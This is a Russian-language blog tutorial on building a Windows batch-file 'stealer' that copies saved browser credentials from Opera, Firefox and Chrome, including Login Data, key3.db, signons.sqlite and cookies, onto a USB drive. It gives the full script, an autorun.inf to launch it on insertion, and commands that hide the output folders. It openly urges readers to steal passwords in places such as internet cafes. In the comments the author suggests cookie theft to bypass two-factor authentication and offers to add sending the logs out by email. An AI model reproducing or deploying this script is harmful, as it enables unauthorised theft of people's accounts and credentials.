Взлом и проверка на уязвимости

Стиллер паролей для браузеров на Windows

Стиллер паролей для браузеров на Windows

Браузеры в скрипте

Сегодня мы поговорим о том, как создать стиллер паролей для браузеров, которые работают под операционной системой Windows. Он будет работать быстро и точно, а самое главное, что на него не будут ругаться антивирусы. Писать стиллер паролей мы будет в обычном блокноте, в конце сохраним его как .bat. У нас уже есть статья, где мы говорили о создании шуточных вирусов – читать.

Стиллер паролей – определенный класс вирусов, функционал которых состоит в том, чтобы украсть сохраненные пароли с компьютера и отправить их “автору”.

Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.

Плюсы:

  • Не ругается антивирус;
  • Скорость работы;
  • Простота в доработке;
  • Возможность мгновенного запуска;
  • Портативность.

Минусы:

  • Autorun не работает на Windows 8+;
  • Постоянное создание\удаление autorun.inf;
  • Личное присутствие;
  • Только для Windows.

Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов

Плюсы и минусы скрипта

Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.

Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.

Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.

Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.

Постоянное создание\удаление autorun.inf – если вы вставите флешку в ПК, а потом пойдёте домой и у вас Windows 8.1 или ниже, то пароли обновятся из-за авторана. Чтобы этого избежать его нужно постоянно удалять, однако в нашем скрипте уже всё есть. Он будет удален автоматически после запуска.

Создаём стиллер паролей для браузеров

Создаём стиллер

Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.

Создаём текстовый документ и пишем туда следующий код:

@echo off
md %~d0\Mozilla
md %~d0\Opera
md %~d0\Google
CD/D %APPDATA%\Opera\Opera\
copy /y wand.dat %~d0\Opera\
copy /y coockies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles*.def-ault
copy /y coockies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y AppData%\Mozilla\Firefox\Profiles*.def-ault %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
copy /y “%localappdata%\Google\Chrome\User Data\Default\Login Data” “%~d0/Google”
ATTRIB -R -A -S -H
attrib +h %~d0\Mozilla
attrib +h %~d0\Opera
attrib +h %~d0\Google
del: Autorun.inf

Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.

Теперь нужно создать файл autorun.inf со следующей командой:

[AUTORUN] open=”anyname.bat”

Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.

Открыть сохраненные пароли можно заменив краденые файлы cookies, базы данных и данные логина. Для удобства можно воспользоваться программой Password Web Views.

Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.

Telegram

Подписывайтесь на официальный Telegram канал сайта Make Info.

nelus

Программист, SEO специалист, GEEK, увлекаюсь новостями из мира IT и безопасностью программного обеспечения.

12 комментариев

  1. А его можно доделать так чтобы файлы после распаковки батника отправились по почте?

    1. Можно, но это уже будет видно и будет считаться вирусом, так как в таком случае его можно будет просто загрузить в Интернет и ждать пока люди скачают. Так как люди скачивают всё подряд без проверки, такого делать никто не рекомендует. Это будет считаться действием вне закона, что может привести к нежелательным последствиям. Мы такому не учим и делать искренне не рекомендуем. Будьте благоразумны и цените свободу людей.

      1. А почему если запускать батник с флешки то скрытие папки с паролями будут на флешке, а если с архива(папки) на компе то бог знает куда забросит, то на диск С, то еще куда то, Как прописать, чтобы данные сохранились в том же архиве(папке) где сам батник?
        Наперед благодарен за ответ!

        1. Данные должны сохранятся в создаваемых директориях:
          md %~d0\Mozilla
          md %~d0\Opera
          md %~d0\Google

          Так как путь здесь указан относительный, в таком случае при запуске на компьютере(не с флешки) папки создаются в каталоге по адресу %~d0 – где d – диск, % – переменная, то есть наша команда указывает на диск, где лежит батник. Вы можете прописать здесь свой путь создания папок для сохранения информации.

        2. Так как я не знаю, как будет называется конкретная папка, конкретного ответа дать не могу. Подсказку я Вам дал.

      2. А может научите делать соединение с интернетом, чтобы логи стилера отправлялись на почту создателя стиллера?

        1. Можно будет подготовить материал, но надо время, статьи выходят каждый день, кроме воскресенья, так как пишу я один. Поделитесь статьей, если вас не затруднит, и можете подписаться на телеграмм. Там вы сможете предлагать свои идеи и я буду писать интересные статьи. Главное, чтобы их читали. Можно будет даже курс сделать, конечно же, бесплатный.

  2. Получается стиллер ворует сохраненные пароли в браузерах? Если пользователь водил свои пароли в браузере, но не нажимал сохранить, то стиллер ничего не найдет?

    1. Вообще да, но можете почитать статью о краже cookie, тогда вы сможете попасть в соц. сети без пароля и обойти двухфакторную аутентификацию.

  3. Я не могу скачать программу для просмотра паролей
    И как он работает объясни лично пожалуйста

    1. Запускается .bat файл, который вытягивает пароли из файлов браузера, в которых сохраняются пароли в тот момент, когда пользователь нажимаем “Сохранить пароль”. Ничего сложного)

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Back to top button
Close